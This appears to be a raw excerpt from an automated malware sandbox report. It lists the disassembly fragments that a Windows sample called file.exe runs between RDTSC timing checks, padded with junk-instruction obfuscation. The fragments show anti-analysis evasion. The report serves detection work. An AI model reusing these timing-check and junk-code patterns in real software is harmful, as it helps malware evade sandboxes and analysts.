Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E30D06 second address: E30D63 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F60F0C8AB69h 0x00000011 jnc 00007F60F0C8AB5Ch 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d jne 00007F60F0C8AB5Ch 0x00000023 jmp 00007F60F0C8AB61h 0x00000028 popad 0x00000029 mov eax, dword ptr [eax] 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e push edi 0x0000002f pop edi 0x00000030 pop esi 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E30D63 second address: E30E22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F60F0BA1035h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F60F0BA1033h 0x00000014 pop eax 0x00000015 jl 00007F60F0BA1026h 0x0000001b xor dword ptr [ebp+122D33D3h], ecx 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F60F0BA1028h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d push 00000000h 0x0000003f jng 00007F60F0BA102Ch 0x00000045 mov dword ptr [ebp+122D20BEh], esi 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f push ecx 0x00000050 call 00007F60F0BA1028h 0x00000055 pop ecx 0x00000056 mov dword ptr [esp+04h], ecx 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc ecx 0x00000063 push ecx 0x00000064 ret 0x00000065 pop ecx 0x00000066 ret 0x00000067 jl 00007F60F0BA1029h 0x0000006d movzx edi, di 0x00000070 push BB8E6E64h 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F60F0BA1039h 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30E22 second address: E30E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30E28 second address: E30E49 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 7B8E6E64h 0x00000013 lea ebx, dword ptr [ebp+12452881h] 0x00000019 movzx edx, ax 0x0000001c push eax 0x0000001d pushad 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50A2E second address: E50A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50BB3 second address: E50BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA102Eh 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007F60F0BA1031h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F60F0BA1026h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50BE1 second address: E50BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F60F0C8AB6Ch 0x0000000c jmp 00007F60F0C8AB60h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50D8B second address: E50D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50D8F second address: E50DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F0C8AB62h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E510A6 second address: E510B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E510B8 second address: E510E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB5Dh 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F60F0C8AB63h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E510E3 second address: E5110A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60F0BA102Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60F0BA102Eh 0x00000012 ja 00007F60F0BA1026h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51266 second address: E5126A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5126A second address: E51287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F60F0BA102Eh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51415 second address: E5145D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Eh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F60F0C8AB66h 0x00000011 pushad 0x00000012 jnp 00007F60F0C8AB56h 0x00000018 jmp 00007F60F0C8AB65h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44950 second address: E44956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44956 second address: E44960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F60F0C8AB56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44960 second address: E44966 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5233A second address: E52343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E52343 second address: E52349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E55CF1 second address: E55CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E20724 second address: E20728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57B80 second address: E57B8E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57B8E second address: E57B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57B92 second address: E57BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F60F0C8AB64h 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F60F0C8AB56h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5818F second address: E581A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jl 00007F60F0BA1026h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E56A14 second address: E56A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F0C8AB5Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E58279 second address: E5827D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5827D second address: E58283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D517 second address: E5D51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D51B second address: E5D527 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F60F0C8AB56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D527 second address: E5D54E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F0BA1037h 0x00000008 js 00007F60F0BA1032h 0x0000000e jp 00007F60F0BA1026h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D54E second address: E5D559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D559 second address: E5D55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D55D second address: E5D578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F60F0C8AB56h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D6CC second address: E5D6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D6D0 second address: E5D6EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F0C8AB65h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DC16 second address: E5DC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F0BA102Ch 0x0000000c jbe 00007F60F0BA1026h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DC2B second address: E5DC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB63h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007F60F0C8AB67h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DDB8 second address: E5DDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DDBF second address: E5DDD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F60F0C8AB56h 0x00000009 je 00007F60F0C8AB56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5DF02 second address: E5DF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1032h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E7F6 second address: E5E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E8E8 second address: E5E8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E8F5 second address: E5E910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F0C8AB5Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E910 second address: E5E936 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 or edi, dword ptr [ebp+122D1B4Eh] 0x0000000e push E19D5980h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F0BA1031h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E936 second address: E5E93B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EA6E second address: E5EA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EA72 second address: E5EA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EC18 second address: E5EC1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F52B second address: E5F531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F66C second address: E5F683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60F0BA102Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F8A8 second address: E5F8AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FA51 second address: E5FA55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FA55 second address: E5FA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FA5F second address: E5FA6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FA6C second address: E5FA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FA70 second address: E5FA79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FAF6 second address: E5FAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FAFA second address: E5FAFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FAFF second address: E5FB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jne 00007F60F0C8AB5Bh 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E609F5 second address: E609F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E609F9 second address: E609FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6080E second address: E6082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F0BA102Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 js 00007F60F0BA1026h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6082D second address: E60847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60F0C8AB65h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A0ED second address: E6A0FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F60F0BA1026h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63B40 second address: E63B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A0FB second address: E6A0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63B44 second address: E63B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c jnp 00007F60F0C8AB5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A0FF second address: E6A111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F60F0BA1026h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63B6C second address: E63B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A111 second address: E6A115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63B73 second address: E63B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A115 second address: E6A11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6BF6E second address: E6BF73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6BF73 second address: E6BFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F60F0BA1028h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sbb bh, FFFFFFC1h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F60F0BA1028h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov ebx, dword ptr [ebp+122D1895h] 0x00000047 push 00000000h 0x00000049 mov ebx, dword ptr [ebp+122D294Ch] 0x0000004f xchg eax, esi 0x00000050 push ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F60F0BA1036h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6CF6D second address: E6CF72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6CF72 second address: E6CFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F60F0BA1028h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov edi, 56AD52E7h 0x00000027 cmc 0x00000028 push 00000000h 0x0000002a mov bx, si 0x0000002d mov di, E6A4h 0x00000031 push 00000000h 0x00000033 mov edi, 145AC298h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6CFB3 second address: E6CFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6CFBA second address: E6CFC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E701DE second address: E70260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F60F0C8AB58h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov di, dx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F60F0C8AB58h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 xor ebx, 47005B63h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F60F0C8AB58h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 xchg eax, esi 0x00000055 jmp 00007F60F0C8AB64h 0x0000005a push eax 0x0000005b push edi 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E721F4 second address: E721FE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E721FE second address: E7224F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F60F0C8AB62h 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 mov dword ptr [ebp+122D1AEBh], esi 0x00000018 mov cl, 74h 0x0000001a popad 0x0000001b push 00000000h 0x0000001d and ebx, dword ptr [ebp+12450B0Ch] 0x00000023 push esi 0x00000024 mov ebx, 520E3AEEh 0x00000029 pop ebx 0x0000002a push eax 0x0000002b push eax 0x0000002c js 00007F60F0C8AB5Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E73176 second address: E73187 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
